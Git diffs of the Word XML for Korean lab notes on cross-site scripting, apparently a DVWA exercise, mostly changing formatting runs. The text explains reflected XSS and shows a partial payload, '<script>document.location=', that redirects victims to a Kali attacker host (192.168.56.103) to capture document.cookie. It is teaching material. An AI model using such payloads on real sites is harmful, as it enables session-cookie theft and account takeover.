+    </w:tblPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
+++ b/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
@@ -1444,6 +1444,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -1536,13 +1537,13 @@
         <w:ind w:leftChars="200" w:left="440"/>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -1588,7 +1589,6 @@
         <w:spacing w:after="0"/>
         <w:ind w:leftChars="200" w:left="440"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -1669,6 +1669,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -1761,7 +1762,6 @@
         <w:spacing w:after="0"/>
         <w:ind w:leftChars="200" w:left="440"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -1793,7 +1793,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
@@ -1947,7 +1946,6 @@
         <w:spacing w:after="0"/>
         <w:ind w:leftChars="200" w:left="440"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -1959,13 +1957,13 @@
         <w:ind w:leftChars="200" w:left="440"/>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -2065,7 +2063,6 @@
         <w:spacing w:after="0"/>
         <w:ind w:leftChars="200" w:left="440" w:firstLineChars="100" w:firstLine="200"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -2109,6 +2106,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -2328,11 +2326,18 @@
         <w:spacing w:after="0"/>
         <w:ind w:firstLineChars="200" w:firstLine="400"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>

--- a/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
+++ b/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
@@ -2326,6 +2326,7 @@
         <w:spacing w:after="0"/>
         <w:ind w:firstLineChars="200" w:firstLine="400"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
@@ -2337,6 +2338,14 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
       </w:r>
     </w:p>
     <w:sectPr>

--- a/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
+++ b/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
@@ -21,29 +21,7 @@
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t xml:space="preserve">크로스 사이트 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-        </w:rPr>
-        <w:t>스크립팅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 공격</w:t>
+        <w:t>크로스 사이트 스크립팅 공격</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -162,61 +140,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">- 스크립트 코드의 실행 시기에 따라 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>리플렉티드</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(reflected) 또는 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>스토어드</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(stored) 크로스 사이트 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>스크립팅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 공격으로 구분할 수 있음.</w:t>
+        <w:t>- 스크립트 코드의 실행 시기에 따라 리플렉티드(reflected) 또는 스토어드(stored) 크로스 사이트 스크립팅 공격으로 구분할 수 있음.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -244,9 +168,8 @@
           <w:bCs/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">1. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>1. 리플렉티드 크로스 사이트 스크립팅(Reflected XSS)</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -254,45 +177,6 @@
           <w:bCs/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>리플렉티드</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>스크립팅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>(Reflected XSS)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
         <w:t xml:space="preserve"> 공격 개요</w:t>
       </w:r>
     </w:p>
@@ -319,25 +203,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">웹 브라우저에 사용자가 입력한 결과가 출력되는 경우, 적절한 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>입력값</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 검증 또는 대응 방안이 없</w:t>
+        <w:t>웹 브라우저에 사용자가 입력한 결과가 출력되는 경우, 적절한 입력값 검증 또는 대응 방안이 없</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -599,43 +465,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">3) </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>리플렉티드</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>스크립팅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 취약점이 있는 웹 사이트는 입력된 스크립트를 반사하여 웹 페이지에 출력</w:t>
+        <w:t>3) 리플렉티드 크로스 사이트 스크립팅 취약점이 있는 웹 사이트는 입력된 스크립트를 반사하여 웹 페이지에 출력</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -711,47 +541,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">2. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>리플렉티드</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>스크립팅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>(Reflected XSS) 공격 실습</w:t>
+        <w:t>2. 리플렉티드 크로스 사이트 스크립팅(Reflected XSS) 공격 실습</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -838,25 +628,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>Low /</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> XSS (Reflected)&gt;</w:t>
+        <w:t xml:space="preserve"> Low / XSS (Reflected)&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -981,43 +753,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">- 어떤 웹 애플리케이션이 사용자가 입력한 값을 그대로 출력하는 경우, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>리플렉티드</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>스크립팅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 취약점이 존재할 가능성 높음</w:t>
+        <w:t>- 어떤 웹 애플리케이션이 사용자가 입력한 값을 그대로 출력하는 경우, 리플렉티드 크로스 사이트 스크립팅 취약점이 존재할 가능성 높음</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1185,43 +921,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">- 스크립트를 입력할 수 있고, 입력된 스크립트가 응답되어 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>리플렉티드</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>스크립팅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 취약점이 존재한다는 것을 확인</w:t>
+        <w:t>- 스크립트를 입력할 수 있고, 입력된 스크립트가 응답되어 리플렉티드 크로스 사이트 스크립팅 취약점이 존재한다는 것을 확인</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1401,25 +1101,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">- 크로스 사이트 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>스크립팅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 공격은 주로 세션 쿠키를 알아내는 데 초점</w:t>
+        <w:t>- 크로스 사이트 스크립팅 공격은 주로 세션 쿠키를 알아내는 데 초점</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1500,25 +1182,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">- 위의 세션 쿠키를 공격자(kali </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>linux</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>)로 전달하기 위해 웹 서버 시작</w:t>
+        <w:t>- 위의 세션 쿠키를 공격자(kali linux)로 전달하기 위해 웹 서버 시작</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1599,25 +1263,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">- 칼리 리눅스의 현재 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 주소는 192.168.56.103</w:t>
+        <w:t>- 칼리 리눅스의 현재 ip 주소는 192.168.56.103</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1803,25 +1449,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t>&lt;script&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>document.location</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>=</w:t>
+              <w:t>&lt;script&gt;document.location=</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1872,73 +1500,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>document.location</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">을 이용하여 지정한 위치로 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>리다이렉트</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:leftChars="200" w:left="440"/>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- 스크립트 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>실행시</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>, 웹 브라우저는 공격자의 호스트로 접속</w:t>
+        <w:t>- document.location을 이용하여 지정한 위치로 리다이렉트</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:leftChars="200" w:left="440"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>- 스크립트 실행시, 웹 브라우저는 공격자의 호스트로 접속</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2019,43 +1599,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">- 요청 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>전송시</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>리다이렉트</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 후 에러 발생 </w:t>
+        <w:t xml:space="preserve">- 요청 전송시, 리다이렉트 후 에러 발생 </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2073,25 +1617,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">-&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>리다이렉트</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 된 cookie라는 URL이 공격자의 호스트에 존재하지 않기 때문 -&gt; 상관 X</w:t>
+        <w:t>-&gt; 리다이렉트 된 cookie라는 URL이 공격자의 호스트에 존재하지 않기 때문 -&gt; 상관 X</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2198,27 +1724,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">- 새로운 로그 중 GET /cookie? 문자열 이후 나오는 내용이 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>document.cookie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>에 의해 출력된 쿠키 정보</w:t>
+        <w:t>- 새로운 로그 중 GET /cookie? 문자열 이후 나오는 내용이 document.cookie에 의해 출력된 쿠키 정보</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2238,23 +1744,13 @@
         </w:rPr>
         <w:t xml:space="preserve">- </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>리플렉티드</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 크로스 사이트 스크립트는 위와 같이 직접 입력보다는 피싱을 통해 정보 탈취</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>리플렉티드 크로스 사이트 스크립트는 위와 같이 직접 입력보다는 피싱을 통해 정보 탈취</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2346,6 +1842,14 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
       </w:r>
     </w:p>
     <w:sectPr>

--- a/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
+++ b/화이트해커를위한웹해킹의기술/5.크로스사이트스크립팅공격.docx
@@ -1850,6 +1850,14 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
       </w:r>
     </w:p>
     <w:sectPr>
